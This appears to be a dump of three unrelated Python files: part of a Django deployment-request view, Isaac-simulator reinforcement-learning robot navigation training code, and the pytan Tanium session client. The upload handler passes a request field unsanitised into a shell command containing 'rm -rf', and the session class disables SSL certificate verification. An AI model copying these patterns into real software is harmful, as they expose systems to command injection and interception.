outputs.update(local={'data': [f'{human_time()} 建立接连... ']})
req.status = '2'
req.do_at = human_datetime()
req.do_by = request.user
if not req.version:
req.version = f'{req.deploy_id}_{req.id}_{datetime.now().strftime("%Y%m%d%H%M%S")}'
req.save()
Thread(target=deploy_dispatch, args=(request, req, token)).start()
return json_response({'token': token, 'type': req.type, 'outputs': outputs})
def patch(self, request, r_id):
form, error = JsonParser(
Argument('reason', required=False),
Argument('is_pass', type=bool, help='参数错误')
).parse(request.body)
if error is None:
req = DeployRequest.objects.filter(pk=r_id).first()
if not req:
return json_response(error='未找到指定申请')
if not form.is_pass and not form.reason:
return json_response(error='请输入驳回原因')
if req.status != '0':
return json_response(error='该申请当前状态不允许审核')
req.approve_at = human_datetime()
req.approve_by = request.user
req.status = '1' if form.is_pass else '-1'
req.reason = form.reason
req.save()
Thread(target=Helper.send_deploy_notify, args=(req, 'approve_rst')).start()
return json_response(error=error)
def do_upload(request):
repos_dir = settings.REPOS_DIR
file = request.FILES['file']
deploy_id = request.POST.get('deploy_id')
if file and deploy_id:
dir_name = os.path.join(repos_dir, deploy_id)
file_name = datetime.now().strftime("%Y%m%d%H%M%S")
command = f'mkdir -p {dir_name} && cd {dir_name} && ls | sort -rn | tail -n +11 | xargs rm -rf'
code, outputs = subprocess.getstatusoutput(command)
if code != 0:
return json_response(error=outputs)
with open(os.path.join(dir_name, file_name), 'wb') as f:
for chunk in file.chunks():
f.write(chunk)
return json_response(file_name)
else:
return HttpResponseBadRequest()
|
process_utils.py
|
from numpy.core.shape_base import stack
from RobotTask import RobotTask
import json
from scipy.signal.ltisys import StateSpace
from VisualTaskEnv import VisualTaskEnv
from isaac import *
import time
import numpy as np
from threading import Thread
from utils import *
import torch
from PyController import PyController
from nav_acl import Nav_ACL
from collections import deque
import copy
from Networks import *
def start_gather_experience(agent_index, shared_elements,config):
########## start isaac app #######################################
app = Application("apps/py_sac_nav_acl/py_sac_nav_acl.app.json")
isaac_thread = Thread(target=start_isaac_application,args=(app,agent_index,config,))
isaac_thread.start()
###########environment and alrogithm setup########################
time.sleep(1)
env = VisualTaskEnv(app,agent_index, "py_controller_"+str(agent_index),config)
torch.manual_seed((23345*agent_index))
np.random.seed((23345*agent_index))
env.seed((23345*agent_index))
##########run episodes'############################################
# run_test_episodes(env, agent_index,shared_elements,config,)
run_episodes(env, agent_index,shared_elements,config,)
app.stop()
def run_test_episodes(env, agent_index,shared_elements, config):
Full_Path = "/home/developer/Training_results/Visual/10/08/2021/16:05:00/"+"_CHECKPOINT_" + "4_19681"
Full_navn = "/home/developer/Training_results/Visual/10/08/2021/16:05:00/"+"_nav_acl_network_" + "4_19681"
No_AE_Path= "/home/developer/Training_results/Visual/10/05/2021/11:19:13/"+"_CHECKPOINT_" + "62_541207"
No_AE_navn= "/home/developer/Training_results/Visual/10/05/2021/11:19:13/"+"_nav_acl_network_" + "62_541207"
RND_Path = "/home/developer/Training_results/Visual/09/30/2021/09:44:53/"+"_CHECKPOINT_" + "22_162675"
RND_navn = "/home/developer/Training_results/Visual/09/30/2021/09:44:53/"+"_nav_acl_network_" + "22_162675"
nav_list = [Full_navn,No_AE_navn,RND_navn]
check_list = [Full_Path,No_AE_Path,RND_Path]
names_list = ["FULL", "No_AE", "RND"]
nav_acl_network = NavACLNetwork(5,config['nav_acl_hidden_dim']).to(train_device)
for model_index in range(len(names_list)):
print("load model: ", check_list[model_index])
checkpoint=torch.load(check_list[model_index])
print("load navacl model: ", nav_list[model_index])
nav_check =torch.load(nav_list[model_index])
nav_acl_network.load_state_dict(nav_check)
print("hat geklappt")
for model_index in range(len(names_list)):
checkpoint=torch.load(check_list[model_index])
nav_check =torch.load(nav_list[model_index])
nav_acl_network.load_state_dict(nav_check)
soft_q_net1 = SoftQNetwork(config).to(train_device)
soft_q_net1.load_state_dict(checkpoint['soft_q_net1'])
model_clone = PolicyNetwork(config)
model_clone.load_state_dict(checkpoint['policy_net'])
model_clone.to(inference_device)
if( (config['q_ricculum_learning']) or config['create_new_AF_database']):
nav_acl = Nav_ACL(nav_acl_network,config,shared_q_net=soft_q_net1,env=env,task_offset=np.array([0,0,0]),agent_index=agent_index)
else:
nav_acl = Nav_ACL(nav_acl_network,config,agent_index=agent_index)
for param in model_clone.parameters():
param.requires_grad = False
test_grid = generate_test_grid()
test_angles = [0,45,-45,90,-90]
# print(test_grid)
for angle in test_angles:
for trial in range(0,4):
print("agent: ", agent_index, " test case: ", angle, trial, "model: ", names_list[model_index])
results = []
for task_offset in test_grid:
orig_offset = task_offset
task_config = config['default_test_unity']
task_config['robot_pose']['rotation_yaw'][0] = angle
task = RobotTask(task_config) # create a task instance from a config dict
task_offset[1] += (agent_index*40)
task = nav_acl.apply_offset_to_robot(task, task_offset)
task = nav_acl.apply_offset_to_dolly(task, [0,(agent_index*40),0])
task.set_q_value(nav_acl.get_q_value_for_task(task,task_offset))
num_steps, task_result, pred_prob = run_episode(env, agent_index, model_clone, nav_acl,shared_elements, 1, 0, config, test_task=task)
results.append([orig_offset,angle,nav_acl.get_task_params_array(task,normalize=False),agent_index,num_steps,task_result, pred_prob])
results_array = np.asarray(results)
np.save("/home/developer/Testing_results/"+names_list[model_index]+"_gt_agent_"+str(agent_index)+"_trial_" + str(trial)+"_yaw_"+str(angle), results_array)
def run_episodes(env, agent_index, shared_elements, config):
max_episodes = config['max_episodes']
num_Agents = config['num_Agents']
num_episodes = int(max_episodes / num_Agents)
steps = 0
robot_grid = generate_robot_grid()
task_offset = robot_grid[agent_index]
model_clone = PolicyNetwork(config)
model_clone.load_state_dict(shared_elements['policy_network'].state_dict())
model_clone.to(inference_device)
for param in model_clone.parameters():
param.requires_grad = False
if( (config['q_ricculum_learning']) or config['create_new_AF_database']):
nav_acl = Nav_ACL(shared_elements['nav_acl_network'],config,shared_q_net=shared_elements['q_network'],env=env,task_offset=task_offset,agent_index=agent_index)
else:
nav_acl = Nav_ACL(shared_elements['nav_acl_network'],config,agent_index=agent_index)
if( config['create_new_AF_database']):
nav_acl.save_tasks_for_later(task_offset,config['new_AF_database_size'],"/home/developer/Training_results/Qricculum_Learning/"+str(agent_index))
print("FINISHED SAVING TASK DATABASE FOR QRICCULUM LEARNING, saved at: ","/home/developer/Training_results/Qricculum_Learning/"+str(agent_index))
nav_acl.load_AF_database("/home/developer/Training_results/Qricculum_Learning/"+str(agent_index)+".npy")
for episode_index in range(num_episodes):
if (episode_index % config['update_nav_nets_every_N_episodes']) == 0:
# Create a new local copy of the latest Policy net before starting the episode
model_clone.load_state_dict(shared_elements['policy_network'].state_dict())
for param in model_clone.parameters():
param.requires_grad = False
if( config['q_ricculum_learning']):
nav_acl.update_networks(shared_elements['nav_acl_network'],shared_elements['q_network'],task_offset)
else:
nav_acl.update_networks(shared_elements['nav_acl_network'],None)
num_steps, result = run_episode(env, agent_index, model_clone, nav_acl,shared_elements, episode_index, steps, config)
steps += num_steps
def run_episode(env, agent_index, policy_net, nav_acl,shared_elements, num_of_episode, steps, config, test_task=None):
num_stacked_frames = config['num_stacked_frames']
train_start = config['train_starts']
max_steps = config['max_steps']
num_Agents = config['num_Agents']
t_max = config['buffer_maxlen']*num_Agents
robot_grid = generate_robot_grid()
task_offset = robot_grid[agent_index]
t = steps*num_Agents # estimate total number of steps in the replay buffer
P_Random = min(nav_acl.config['adaptive_filtering_params']['p_random_max'], t/t_max)
P_Easy = ((1-P_Random)/2)
P_Frontier = P_Easy
action_dim = (2)
nav_acl.adaptive_filtering_task_probs = [P_Random,P_Easy,P_Frontier]
if(test_task is None):
task = nav_acl.generate_random_task(translation_offset=task_offset)
else:
print("TEST TASK")
task = test_task
pred_prob_worker = nav_acl.get_task_success_probability(task).detach().cpu().numpy()
step_durations = shared_elements['step_durations']
episode_rewards = shared_elements['episode_rewards']
episode_lengths = shared_elements['episode_lengths']
intermediate_buffer = shared_elements['experience_queue']
intermediate_buffer_nav_acl = shared_elements['nav_acl_exp_queue']
obs_cam, obs_lidar = env.reset(task)
env.step([0,0])
obs_cam, obs_lidar = env.reset(task)
stacked_camera_obsrv = deque(maxlen=num_stacked_frames)
stacked_actions = deque(maxlen=num_stacked_frames)
stacked_rewards = deque(maxlen=num_stacked_frames)
transitions = deque(maxlen=num_stacked_frames)
episode_reward = 0
ep_steps = 0
prev_action = np.zeros(action_dim)
prev_reward = config['step_penalty']
task_result = [0]
episode_exp = []
# start with a fresh state
for i in range(num_stacked_frames):
stacked_camera_obsrv.append(obs_cam)
stacked_actions.append(prev_action)
stacked_rewards.append(prev_reward)
if(config['use_snail_mode']):
transitions.append((obs_cam, obs_lidar,prev_action,prev_reward))
start_episode = current_milli_time()
for step in range(max_steps):
start = current_milli_time()
stacked_camera_state = np.asarray(stacked_camera_obsrv).reshape((env.observtion_shape[0]*num_stacked_frames,env.observtion_shape[1],env.observtion_shape[2]))
stacked_prev_action = np.asarray(stacked_actions) # [a-4,a-3, a-2, a-1]
stacked_prev_reward = np.asarray(stacked_rewards).reshape(num_stacked_frames,1)
with torch.no_grad():
if steps >= train_start:
action = policy_net.get_action(stacked_camera_state,obs_lidar,stacked_prev_action,stacked_prev_reward, deterministic = False, device=inference_device)
else:
action = policy_net.sample_action()
### do action and get observation
step_start = current_milli_time()
next_obs_cam, next_obs_lidar, reward, done, info = env.step(action)
### append new action and reward (has to happen before appending to the replay buffer!)
stacked_actions.append(action) # [a-3,a-2,a-1, a]
stacked_rewards.append(reward)
stacked_action = np.asarray(stacked_actions)
stacked_reward = np.asarray(stacked_rewards).reshape(num_stacked_frames,1)
### append to episode exp
episode_exp.append((obs_cam, obs_lidar, stacked_action, stacked_prev_action, stacked_reward, stacked_prev_reward, next_obs_cam, next_obs_lidar, done))
stacked_camera_obsrv.append(next_obs_cam) # has to happen after appending to the replay buffer
obs_cam, obs_lidar = next_obs_cam, next_obs_lidar
episode_reward += reward
end = current_milli_time()
step_durations.append(end-start)
prev_action = action
prev_reward = reward
ep_steps += 1
### some manual cleanup to prevent numpy from polluting my memory
del stacked_camera_state, next_obs_cam, next_obs_lidar
if done:
if info['collision']:
task_result = [0]
else:
task_result = [1]
break
time_for_episode = current_milli_time()-start_episode
avg_time_per_step = int(time_for_episode / ep_steps)
print('Agent: ', agent_index, 'Finished Episode: ', num_of_episode, ' | Pred prob.: ', round(pred_prob_worker[0],2), ' | was considered: ', task.task_type.name, '| Episode Reward: ', round(episode_reward,2), ' | Num steps: ', ep_steps, '| avg time per step: ',avg_time_per_step, ' | done: ', task_result[0])
episode_rewards.append(episode_reward)
episode_lengths.append(ep_steps)
nav_acl.params.append(nav_acl.get_task_params_array(task,False)) # append the non normalized version of the task since we need that information for our statistics
# append results to the shared queue
intermediate_buffer_nav_acl.put((task,task_result,agent_index))
intermediate_buffer.put(episode_exp)
return ep_steps, task_result[0], pred_prob_worker
def start_isaac_sim_connector(num_Agents=1, start_port=64000):
""" creates PyCodelets for receiving and sending messages to/from the isaac simulation environment (either Unity or Omniverse) via specified tcp subscriber and publisher nodes to allow for parallel access to the simulation """
app = Application("apps/py_sac_nav_acl/py_sim_connector.app.json")
PUB_PORT_NUM = start_port
SUB_PORT_NUM = start_port+1000
for index in range(num_Agents):
#create application and create node
agent_suffix = '_'+str(index)
app_name = "connector" +agent_suffix
connector = app.add(app_name)
tcp_sub = connector.add(app.registry.isaac.alice.TcpSubscriber)
tcp_pub = connector.add(app.registry.isaac.alice.TcpPublisher)
connector.add(app.registry.isaac.alice.TimeSynchronizer)
tcp_sub.config['port'] = SUB_PORT_NUM + index
tcp_sub.config['host'] = 'localhost'
tcp_pub.config['port'] = PUB_PORT_NUM + index
#receive messages from sim and publish via TCP
app.connect('simulation.interface/output', 'collision'+agent_suffix, app_name+'/TcpPublisher', 'collision'+agent_suffix)
app.connect('simulation.interface/output', 'bodies'+agent_suffix, app_name+'/TcpPublisher', 'bodies'+agent_suffix)
app.connect('simulation.interface/output', 'rangescan_front'+agent_suffix, app_name+'/TcpPublisher', 'rangescan_front'+agent_suffix)
app.connect('simulation.interface/output', 'rangescan_back'+agent_suffix, app_name+'/TcpPublisher', 'rangescan_back'+agent_suffix)
app.connect('simulation.interface/output', 'color'+agent_suffix, app_name+'/TcpPublisher', 'color'+agent_suffix)
#receive messages from TCP and publish them to the simulation
print("messages coming from: ", SUB_PORT_NUM + index, "go to :", 'simulation.interface/input/####'+agent_suffix)
#send control messages
app.connect(app_name+'/TcpSubscriber', 'diff_command'+agent_suffix, 'simulation.interface/input', 'base_command'+agent_suffix)
app.connect(app_name+'/TcpSubscriber', 'teleport_robot'+agent_suffix, 'simulation.interface/input', 'teleport_robot' +agent_suffix)
app.connect(app_name+'/TcpSubscriber', 'teleport_dolly'+agent_suffix, 'simulation.interface/input', 'teleport_dolly' +agent_suffix)
app.connect(app_name+'/TcpSubscriber', 'teleport_obstacle'+agent_suffix, 'simulation.interface/input', 'teleport_obstacle' +agent_suffix)
app.connect(app_name+'/TcpSubscriber', 'teleport_obstacle'+agent_suffix+"_1", 'simulation.interface/input', 'teleport_obstacle' +agent_suffix+"_1")
app.connect(app_name+'/TcpSubscriber', 'teleport_obstacle'+agent_suffix+"_2", 'simulation.interface/input', 'teleport_obstacle' +agent_suffix+"_2")
app.connect(app_name+'/TcpSubscriber', 'teleport_obstacle'+agent_suffix+"_3", 'simulation.interface/input', 'teleport_obstacle' +agent_suffix+"_3")
app.start()
while True:
time.sleep(5)
app.stop()
def start_isaac_application(app, agent_index, config):
""" creates PyCodelets for receiving and sending messages to/from the isaac simulation environment (either Unity or Omniverse) """
Port = config['start_port']
PUB_PORT_NUM = Port + 1000
SUB_PORT_NUM = Port
#create application and create node
agent_suffix = '_'+str(agent_index)
app_name = "py_controller" +agent_suffix
py_controller_node = app.add(app_name)
component_node = py_controller_node.add(PyController)
component_node.config['app_name'] = app_name
component_node.config['agent_index'] = agent_index
component_node.config['tick_period_seconds'] = config['tick_period_seconds']
component_node.config['action_duration_ticks'] = config['action_duration_ticks']
component_node.config['depth_cam_max_distance'] = config['depth_cam_max_distance']
component_node.config['lidar_max_distance'] = config['lidar_max_distance']
component_node.config['goal_threshold'] = config['goal_threshold']
component_node.config['output_resolution'] = config['output_resolution']
component_node.config['using_depth'] = config['using_depth']
component_node.config['using_unity'] = config['using_unity']
component_node.config['goal_description'] = config['goal_description']
component_node.config['omniverse_teleport_dict'] = config['omniverse_teleport_dict']
component_node.config['scale_dolly'] = config['scale_dolly']
contact_monitor_node = py_controller_node.add(app.registry.isaac.navigation.CollisionMonitor, 'CollisionMonitor')
tcp_sub = py_controller_node.add(app.registry.isaac.alice.TcpSubscriber)
tcp_pub = py_controller_node.add(app.registry.isaac.alice.TcpPublisher)
py_controller_node.add(app.registry.isaac.alice.TimeSynchronizer)
tcp_sub.config['port'] = SUB_PORT_NUM + agent_index
tcp_sub.config['host'] = 'localhost'
tcp_pub.config['port'] = PUB_PORT_NUM + agent_index
print("start isaac app: ", agent_index, " \n SUB_PORT: ", SUB_PORT_NUM, "\n PUB_PORT: ", PUB_PORT_NUM, "\n")
#receive messages
app.connect(app_name+'/TcpSubscriber', 'collision'+agent_suffix, app_name+'/CollisionMonitor', 'collision')
app.connect(app_name+'/CollisionMonitor', 'report', app_name+'/PyCodelet', 'collision'+agent_suffix)
app.connect(app_name+'/TcpSubscriber', 'collision'+agent_suffix, app_name+'/PyCodelet', 'collision'+agent_suffix)
app.connect(app_name+'/TcpSubscriber', 'bodies'+agent_suffix, app_name+'/PyCodelet', 'bodies'+agent_suffix)
app.connect(app_name+'/TcpSubscriber', 'rangescan_front'+agent_suffix, app_name+'/PyCodelet', 'lidar_front'+agent_suffix)
app.connect(app_name+'/TcpSubscriber', 'rangescan_back'+agent_suffix, app_name+'/PyCodelet', 'lidar_back'+agent_suffix)
app.connect(app_name+'/TcpSubscriber', 'color'+agent_suffix, app_name+'/PyCodelet', 'color'+agent_suffix)
print("STARTED CONTROLLER WITH NAME: ", app_name, "RECEIVING TCP ON ", SUB_PORT_NUM +agent_index, "SENDING TCP ON: ", PUB_PORT_NUM+agent_index)
#send control messages
app.connect(app_name+'/PyCodelet', 'diff_command'+agent_suffix, app_name+'/TcpPublisher', 'diff_command'+agent_suffix)
app.connect(app_name+'/PyCodelet', 'teleport_robot'+agent_suffix, app_name+'/TcpPublisher', 'teleport_robot'+agent_suffix)
app.connect(app_name+'/PyCodelet', 'teleport_dolly'+agent_suffix, app_name+'/TcpPublisher', 'teleport_dolly'+agent_suffix)
app.connect(app_name+'/PyCodelet', 'teleport_obstacle'+agent_suffix, app_name+'/TcpPublisher', 'teleport_obstacle'+agent_suffix)
app.connect(app_name+'/PyCodelet', 'teleport_obstacle'+agent_suffix + "_1", app_name+'/TcpPublisher', 'teleport_obstacle'+agent_suffix+ "_1")
app.connect(app_name+'/PyCodelet', 'teleport_obstacle'+agent_suffix + "_2", app_name+'/TcpPublisher', 'teleport_obstacle'+agent_suffix+ "_2")
app.connect(app_name+'/PyCodelet', 'teleport_obstacle'+agent_suffix + "_3", app_name+'/TcpPublisher', 'teleport_obstacle'+agent_suffix+ "_3")
app.start()
|
sessions.py
|
"""Session classes for the :mod:`pytan` module."""
from builtins import str
from builtins import object
import json
import logging
import os
import re
import string
import sys
import threading
import time
from base64 import b64encode
from datetime import datetime
try:
import xml.etree.cElementTree as ET
except Exception:
import xml.etree.ElementTree as ET
my_file = os.path.abspath(__file__)
my_dir = os.path.dirname(my_file)
parent_dir = os.path.dirname(my_dir)
path_adds = [parent_dir]
[sys.path.insert(0, aa) for aa in path_adds if aa not in sys.path]
try:
import pytan
from pytan.xml_clean import xml_cleaner
import requests
import taniumpy
except Exception:
raise
requests.packages.urllib3.disable_warnings()
if sys.version_info < (3,0):
reload(sys)
sys.setdefaultencoding('utf-8')
class Session(object):
"""This session object uses the :mod:`requests` package instead of the built in httplib library.
This provides support for keep alive, gzip, cookies, forwarding, and a host of other features
automatically.
Examples
--------
Setup a Session() object::
>>> import sys
>>> sys.path.append('/path/to/pytan/')
>>> import pytan
>>> session = pytan.sessions.Session('host')
Authenticate with the Session() object::
>>> session.authenticate('username', 'password')
"""
XMLNS = {
'SOAP-ENV': 'xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"',
'xsd': 'xmlns:xsd="http://www.w3.org/2001/XMLSchema"',
'xsi': 'xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"',
'typens': 'xmlns:typens="urn:TaniumSOAP"',
}
"""The namespace mappings for use in XML Request bodies"""
REQUEST_BODY_BASE = ("""<SOAP-ENV:Envelope {SOAP-ENV} {xsd} {xsi}>
<SOAP-ENV:Body>
<typens:tanium_soap_request {typens}>
<command>$command</command>
<object_list>$object_list</object_list>
$options
</typens:tanium_soap_request>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>""").format(**XMLNS)
"""The XML template used for all SOAP Requests in string form"""
AUTH_RES = 'auth'
"""The URL to use for authentication requests"""
SOAP_RES = 'soap'
"""The URL to use for SOAP requests"""
INFO_RES = 'info.json'
"""The URL to use for server info requests"""
AUTH_CONNECT_TIMEOUT_SEC = 5
"""number of seconds before timing out for a connection while authenticating"""
AUTH_RESPONSE_TIMEOUT_SEC = 15
"""number of seconds before timing out for a response while authenticating"""
INFO_CONNECT_TIMEOUT_SEC = 5
"""number of seconds before timing out for a connection while getting server info"""
INFO_RESPONSE_TIMEOUT_SEC = 15
"""number of seconds before timing out for a response while getting server info"""
SOAP_CONNECT_TIMEOUT_SEC = 15
"""number of seconds before timing out for a connection while sending a SOAP Request"""
SOAP_RESPONSE_TIMEOUT_SEC = 540
"""number of seconds before timing out for a response while sending a SOAP request"""
SOAP_REQUEST_HEADERS = {'Content-Type': 'text/xml; charset=utf-8', 'Accept-Encoding': 'gzip'}
"""dictionary of headers to add to every HTTP GET/POST"""
ELEMENT_RE_TXT = r'<{0}>(.*?)</{0}>'
"""regex string to search for an element in XML bodies"""
HTTP_DEBUG = False
"""print requests package debug or not"""
HTTP_RETRY_COUNT = 5
"""number of times to retry HTTP GET/POST's if the connection times out/fails"""
HTTP_AUTH_RETRY = True
"""retry HTTP GET/POST's with username/password if session_id fails or not"""
STATS_LOOP_ENABLED = False
"""enable the statistics loop thread or not"""
STATS_LOOP_SLEEP_SEC = 5
"""number of seconds to sleep in between printing the statistics when stats_loop_enabled is True"""
STATS_LOOP_TARGETS = [
{'Version': 'Settings/Version'},
{'Active Questions': 'Active Question Cache/Active Question Estimate'},
{'Clients': 'Active Question Cache/Active Client Estimate'},
{'Strings': 'String Cache/Total String Count'},
{'Handles': 'System Performance Info/HandleCount'},
{'Processes': 'System Performance Info/ProcessCount'},
{'Memory Available': 'percentage(System Performance Info/PhysicalAvailable,System Performance Info/PhysicalTotal)'},
]
"""list of dictionaries with the key being the section of info.json to print info from, and the value being the item with in that section to print the value"""
RECORD_ALL_REQUESTS = False
"""Controls whether each requests response object is appended to the self.ALL_REQUESTS_RESPONSES list"""
BAD_RESPONSE_CMD_PRUNES = [
'\n',
'XML Parse Error: ',
'SOAPProcessing Exception: class ',
'ERROR: 400 Bad Request'
]
"""List of strings to remove from commands in responses that do not match the response in the request"""
AUTH_FAIL_CODES = [401, 403]
"""List of HTTP response codes that equate to authorization failures"""
BAD_SERVER_VERSIONS = [None, '', 'Unable to determine', 'Not yet determined']
"""List of server versions that are not valid"""
# TRACKING VARIABLES -- THESE GET UPDATED BY SESSION
ALL_REQUESTS_RESPONSES = []
"""This list will be updated with each requests response object that was received"""
LAST_REQUESTS_RESPONSE = None
"""This variable will be updated with the last requests response object that was received"""
LAST_RESPONSE_INFO = {}
"""This variable will be updated with the information from the most recent call to _get_response()"""
host = None
"""host to connect to"""
port = None
"""port to connect to"""
server_version = "Not yet determined"
"""version string of server, will be updated when get_server_version() is called"""
force_server_version = ''
"""In the case where the user wants to have pytan act as if the server is a specific version, regardless of what server_version is."""
def __init__(self, host, port=443, **kwargs):
"""Constructor."""
self.methodlog = logging.getLogger("method_debug")
self.DEBUG_METHOD_LOCALS = kwargs.get('debug_method_locals', False)
self.setup_logging()
self.REQUESTS_SESSION = requests.Session()
"""
The Requests session allows you to persist certain parameters across requests. It also
persists cookies across all requests made from the Session instance. Any requests that you
make within a session will automatically reuse the appropriate connection
"""
# disable SSL cert verification for all requests made in this session
self.REQUESTS_SESSION.verify = False
server = kwargs.get('server', '')
self.host = server or host
self.server = self.host
self.port = port
self._session_id = ''
self._username = ''
self._password = ''
# kwargs overrides for object properties
self.SOAP_REQUEST_HEADERS = kwargs.get(
'soap_request_headers', self.SOAP_REQUEST_HEADERS)
self.HTTP_DEBUG = kwargs.get('http_debug', False)
self.HTTP_AUTH_RETRY = kwargs.get('http_auth_retry', self.HTTP_AUTH_RETRY)
self.HTTP_RETRY_COUNT = kwargs.get('http_retry_count', self.HTTP_RETRY_COUNT)
self.AUTH_CONNECT_TIMEOUT_SEC = kwargs.get(
'auth_connect_timeout_sec', self.AUTH_CONNECT_TIMEOUT_SEC)
self.AUTH_RESPONSE_TIMEOUT_SEC = kwargs.get(
'auth_response_timeout_sec', self.AUTH_RESPONSE_TIMEOUT_SEC)
self.INFO_CONNECT_TIMEOUT_SEC = kwargs.get(
'info_connect_timeout_sec', self.INFO_CONNECT_TIMEOUT_SEC)
self.INFO_RESPONSE_TIMEOUT_SEC = kwargs.get(
'info_response_timeout_sec', self.INFO_RESPONSE_TIMEOUT_SEC)
self.SOAP_CONNECT_TIMEOUT_SEC = kwargs.get(
'soap_connect_timeout_sec', self.SOAP_CONNECT_TIMEOUT_SEC)
self.SOAP_RESPONSE_TIMEOUT_SEC = kwargs.get(
'soap_response_timeout_sec', self.SOAP_RESPONSE_TIMEOUT_SEC)
self.STATS_LOOP_ENABLED = kwargs.get('stats_loop_enabled', self.STATS_LOOP_ENABLED)
self.STATS_LOOP_SLEEP_SEC = kwargs.get('stats_loop_sleep_sec', self.STATS_LOOP_SLEEP_SEC)
self.STATS_LOOP_TARGETS = kwargs.get('stats_loop_targets', self.STATS_LOOP_TARGETS)
self.RECORD_ALL_REQUESTS = kwargs.get('record_all_requests', self.RECORD_ALL_REQUESTS)
# re-enforce empty variables for init of session
self.ALL_REQUESTS_RESPONSES = []
self.LAST_RESPONSE_INFO = {}
self.LAST_REQUESTS_RESPONSE = None
self.server_version = "Not yet determined"
self.force_server_version = kwargs.get('force_server_version', self.force_server_version)
def setup_logging(self):
"""Logging."""
self.qualname = "pytan.sessions.{}".format(self.__class__.__name__)
self.mylog = logging.getLogger(self.qualname)
self.authlog = logging.getLogger(self.qualname + ".auth")
self.httplog = logging.getLogger(self.qualname + ".http")
self.bodyhttplog = logging.getLogger(self.qualname + ".http.body")
self.statslog = logging.getLogger("stats")
def __str__(self):
"""String method."""
class_name = self.__class__.__name__
server_version = self.get_server_version()
str_tpl = "{} to {}:{}, Authenticated: {}, Platform Version: {}".format
ret = str_tpl(class_name, self.host, self.port, self.is_auth, server_version)
return ret
@property
def session_id(self):
"""Property to fetch the session_id for this object.
Returns
-------
self._session_id : str
"""
return self._session_id
@session_id.setter
def session_id(self, value):
"""Setter to update the session_id for this object."""
if self.session_id != value:
self._session_id = value
self.authlog.debug("Session ID updated to: {}".format(value))
@property
def is_auth(self):
"""Property to determine if there is a valid session_id or username and password stored in this object.
Returns
-------
bool
* True: if self._session_id or self._username and _self.password are set
* False: if not
"""
auth = False
if self._session_id:
auth = True
elif self._username and self._password:
auth = True
return auth
def logout(self, all_session_ids=False, **kwargs):
"""Logout a given session_id from Tanium. If not session_id currently set, it will authenticate to get one.
Parameters
----------
all_session_ids : bool, optional
* default: False
* False: only log out the current session id for the current user
* True: log out ALL session id's associated for the current user
pytan_help : str, optional
* default: ''
* help string to add to self.LAST_REQUESTS_RESPONSE.pytan_help
"""
self._check_auth()
if not self.session_id:
self.authenticate()
if all_session_ids:
logout = 1
else:
logout = 0
headers = {}
headers['session'] = self.session_id
headers['logout'] = logout
req_args = {}
req_args['url'] = self.AUTH_RES
req_args['headers'] = headers
req_args['retry_count'] = False
req_args['pytan_help'] = kwargs.get('pytan_help', '')
try:
self.http_get(**req_args)
except Exception as e:
m = "logout exception: {}".format
self.authlog.debug(m(e))
if all_session_ids:
self.authlog.debug("Successfully logged out all session ids for current user")
else:
self.authlog.debug("Successfully logged out current session id for current user")
self.session_id = ''
def authenticate(self, username=None, password=None, session_id=None, **kwargs):
"""Authenticate against a Tanium Server using a username/password or a session ID.
Parameters
----------
username : str, optional
* default: None
* username to authenticate as
password : str, optional
* default: None
* password for `username`
session_id : str, optional
* default: None
* session_id to authenticate with, this will be used in favor of username/password if all 3 are supplied.
persistent: bool, optional
* default: False
* False: do not request a persistent session (returns a session_id that expires 5 minutes after last use)
* True: do request a persistent (returns a session_id that expires 1 week after last use)
pytan_help : str, optional
* default: ''
* help string to add to self.LAST_REQUESTS_RESPONSE.pytan_help
Notes
-----
Can request a persistent session that will last up to 1 week when authenticating
with username and password.
New persistent sessions may be handed out by the Tanium server when the session handed
by this auth call is used to login with that week. The new session must be used to login,
as no matter what persistent sessions will expire 1 week after issuance (or when logout is
called with that session, or when logout with all_sessions=True is called for any session
for this user)
the way sessions get issued:
- a GET request to /auth is issued
- username/password supplied in headers as base64 encoded, or session is supplied in
headers as string
- session is returned upon successful auth
- if there is a header "persistent=1" in the headers, a session that expires after 1 week
will be issued if username/password was used to auth. persistent is ignored if session
is used to auth.
- if there is not a header "persistent=1" in the headers, a session that expires after 5
minutes will be issued
- if session is used before it expires, it's expiry will be extended by 5 minutes or 1
week, depending on the type of persistence
- while using the SOAP api, new session ID's may be returned as part of the response.
these new session ID's should be used in lieu of the old session ID
/auth URL
This url is used for validating a server user's credentials. It supports a few different
ways to authenticate and returns a SOAP session ID on success. These sessions expire
after 5 minutes by default if they aren't used in SOAP requests. This expiration is
configured with the server setting 'session_expiration_seconds'.
Supported Authentication Methods:
- HTTP Basic Auth (Clear Text/BASE64)
- Username/Password/Domain Headers (Clear Text)
- Negotiate (NTLM Only)
NTLM is enabled by default in 6.3 or greater and requires a persistent connection until a
session is generated.
"""
persistent = kwargs.get('persistent', False)
auth_type = 'unknown'
if session_id:
auth_type = 'session ID'
if persistent:
m = (
"Unable to establish a persistent session when authenticating with a session!"
).format
raise pytan.exceptions.AuthorizationError(m())
self._session_id = session_id
else:
auth_type = 'username/password'
if username:
self._username = username
if password:
self._password = password
if not session_id:
if not self._username:
raise pytan.exceptions.AuthorizationError("Must supply username")
if not self._password:
raise pytan.exceptions.AuthorizationError("Must supply password")
auth_headers = {}
if persistent:
auth_headers['persistent'] = 1
h = "Authenticate to the SOAP API via /auth"
pytan_help = kwargs.get('pytan_help', h)
req_args = {}
req_args['url'] = self.AUTH_RES
req_args['headers'] = auth_headers
req_args['retry_count'] = kwargs.get('retry_count', 0)
req_args['connect_timeout'] = kwargs.get('connect_timeout', self.AUTH_CONNECT_TIMEOUT_SEC)
req_args['response_timeout'] = kwargs.get(
'response_timeout', self.AUTH_RESPONSE_TIMEOUT_SEC
)
req_args['pytan_help'] = pytan_help
try:
body = self.http_get(**req_args)
except Exception as e:
m = "Error while trying to authenticate: {}".format
raise pytan.exceptions.AuthorizationError(m(e))
self.session_id = body
if persistent:
m = (
"Successfully authenticated and received a persistent (up to 1 week)"
"session id using {}"
).format
self.authlog.debug(m(auth_type))
else:
m = (
"Successfully authenticated and received a non-persistent (up to 5 minutes) "
"session id using {}"
).format
self.authlog.debug(m(auth_type))
# start the stats thread loop in a background thread
self._start_stats_thread(**kwargs)
def find(self, obj, **kwargs):
"""Create and send a GetObject XML Request body from `object_type` and parses the response into an appropriate :mod:`taniumpy` object.
Parameters
----------
obj : :class:`taniumpy.object_types.base.BaseType`
* object to find
Returns
-------
obj : :class:`taniumpy.object_types.base.BaseType`
